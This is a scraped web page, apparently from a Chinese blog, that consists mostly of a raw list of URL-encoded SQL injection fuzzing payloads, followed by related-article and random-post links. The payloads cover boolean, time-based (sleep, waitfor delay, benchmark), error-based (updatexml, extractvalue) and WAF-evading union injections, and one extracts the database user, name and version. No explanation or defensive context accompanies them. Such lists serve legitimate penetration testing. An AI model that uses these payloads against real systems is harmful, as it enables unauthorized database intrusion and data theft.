\
'
"
%df'
%df"
and%201=1
and%201=2
'%20and%20'1'='1
'%20and%20'1'='2
"%20and%20"1"="1
"%20and%20"1"="2
)%20and%20(1=1
)%20and%20(1=2
')%20and%20('1'='1
')%20and%20('1'='2
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
OR%201=1
OR%201=2
'%20OR%201=1--%20-
'%20OR%201=2--%20-
)%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=1--%20-
')%20OR%201=2--%20-
"%20OR%20"1"="1
"%20OR%20"1"="2
'%20OR%20'1'='1
'%20OR%20'1'='2
)%20OR%20(1=1
)%20OR%20(1=2
')%20OR%20('1'='1
')%20OR%20('1'='2
(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
,(1-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,(1-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,1=if((1=1),1,(select%201%20union%20select%202))
,1=if((1=2),1,(select%201%20union%20select%202))
,If((1=1),1,(select%201%20union%20select%202))--%20-
,If((1=2),1,(select%201%20union%20select%202))--%20-
,If((1=1),sleep(4),(select%201%20union%20select%202))--%20-
-IF((1=1),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-IF((1=2),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
'%2b(if((1=1%20and%20sleep(4)),1,(select%201%20union%20select%202)))%2b'a
-IF((1=1),sleep(4),(SELECT%201%20UNION%20SELECT%202))--%20-
';(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
;SELECT%20sleep(4)
);SELECT%20sleep(4)--%20-
;SELECT%20sleep(4)--%20-
;(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
'%20AND%20SLEEP(4)%23
AND%20sleep(4)
'%20AND%20sleep(4)%20AND%20'1'='1
')%20AND%20sleep(4)%20AND%20('1'='1
)%20AND%20sleep(4)%20AND%20(1=1
"%20AND%20sleep(4)%20AND%20"1"="
')%20and%20(select(0)from(select(sleep(4)))x)--%20-
and%20(select(0)from(select(sleep(4)))x)
and%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20and%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
"%20and%20(select(0)from(select(sleep(4)))x)%20and%20"1"="1
)%20and%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20and%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
rlike%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
)%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
;waitfor%20delay%20'0:0:4'%20--%20-
';waitfor%20delay%20'0:0:4'%20--%20-
);waitfor%20delay%20'0:0:4'%20--%20-
');waitfor%20delay%20'0:0:4'%20--%20-
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
(SELECT%20*%20FROM(SELECT(sleep(4)))lWuP)
procedure%20analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)
xor%201=2
xor%202=2
%2527%20%20%20%20%20%20%20
%0A%09UNION%0CSELECT%A0NULL%20%23
UNION%20SELECT%20/*!50000%205,null;%00*//*!40000%204,null--%20,*//*!30000%203,null--%20x*/0,null--+
''%20or%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x7c,database(),0x7c,version())),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23
''%20or%20updatexml(1,concat(0x7e,(database())),0)%20

盲注fuzz的更多相关文章

  1. mysql基于“时间”的盲注

    无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...

  2. SQL盲注之正则攻击

    我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息.故攻击方式如下: 1. 判断第一个表名的第一个字符是否是a-z中的字符,其中bli ...

  3. sql 盲注之正则表达式攻击

    -----------------------------------------MYSQL 5+----------------------------------------- 我们都已经知道,在 ...

  4. 小白日记42:kali渗透测试之Web渗透-SQL盲注

    SQL盲注 [SQL注入介绍] SQL盲注:不显示数据库内建的报错信息[内建的报错信息帮助开发人员发现和修复问题],但由于报错信息中提供了关于系统的大量有用信息.当程序员隐藏了数据库内建报错信息,替换 ...

  5. UPdate 延时盲注之小技巧

    Title:UPdate 延时盲注之小技巧  --2014-06-05 15:21 UPDATE TABLEZZZ SET zz=111111 where id=$id 当TABLEZZZ表为空的时候 ...

  6. WEB安全实战(一)SQL盲注

    前言 好长时间没有写过东西了,不是不想写,仅仅只是是一直静不下心来写点东西.当然,拖了这么长的时间,也总该写点什么的.近期刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈近期接触到的安全 ...

  7. zzcms8.2#任意用户密码重置#del.php时间盲注#复现

    00x0 引言 早上起来,发现seebug更新了一批新的洞, 发现zzcms8.2这个洞好多人在挖,于是我就默默的踏上了复现之路(要不是点进去要买详情,我何必这么折腾~) 环境:zzcms8.2(产品 ...

  8. 实验吧_who are you?(盲注)

    who are you? 翻翻源码,抓抓包,乱试一通都没有什么结果 题目中提示有ip,立马应该联想到X-Forwarded-For 虽然知道是这个方面的题,但完全不知道从何入手,悄咪咪去翻一下wp 才 ...

  9. Python:SQLMap源码精读—基于时间的盲注(time-based blind)

    建议阅读 Time-Based Blind SQL Injection Attacks 基于时间的盲注(time-based blind) 测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以 ...

随机推荐

  1. 如何让ThreadPoolExecutor更早地创建非核心线程

    最近在项目中遇到一个需要用线程池来处理任务的需求,于是我用ThreadPoolExecutor来实现,但是在实现过程中我发现提交大量任务时它的处理逻辑是这样的(提交任务还有一个submit方法内部也调 ...

  2. 用python把技术文档中,每个模块系列截图生成一个动态GIF

    前言 本文的文字及图片来源于网络,仅供学习.交流使用,不具有任何商业用途,版权归原作者所有,如有问题请及时联系我们以作处理. 最近在写技术文档的时候,发现一个问题.对于每个技术步骤,都需要一个截图,这 ...

  3. MySQL的远程链接

    安装好我们的mMySQL,是不是也有种无从下手的感觉,不用怕,接下来我们可以使用远程连接来可视化我们的数据库的数据: 1. 打开我们的数据库,帐号是root,密码查看文件就行了 2.使用命令: mys ...

  4. Selenium常见报错问题(3)- 解决和分析NoSuchElementException

    如果你在跑selenium脚本时,需要某些异常不知道怎么解决时,可以看看这一系列的文章,看看有没有你需要的答案 https://www.cnblogs.com/poloyy/category/1749 ...

  5. BareTail 观看文件增加的工具

  6. [Inno Setup] Do not show application version in “Program and Features” control panel

    Set AppVersion empty. But, then you have to set the AppVerName. Depending on your needs either set i ...

  7. 在java中使用JMH(Java Microbenchmark Harness)做性能测试

    文章目录 使用JMH做性能测试 BenchmarkMode Fork和Warmup State和Scope 在java中使用JMH(Java Microbenchmark Harness)做性能测试 ...

  8. iOS Block 页面传值

    为什么80%的码农都做不了架构师?>>>   直接上代码 1.定义block @interface TopTypeCollectionView : UIView @property ...

  9. ServerVariables集合

    当讨论Request对象内容时,要研究的集合之一就是ServerVariables集合.这个集合包含了两种值的结合体,一种是随同页面请求从客户端发送到服务器的HTTP报头中的值,另外一种是由服务器在接 ...

  10. phpsocket.io

    https://github.com/walkor/phpsocket.io phpsocket.io A server side alternative implementation of sock ...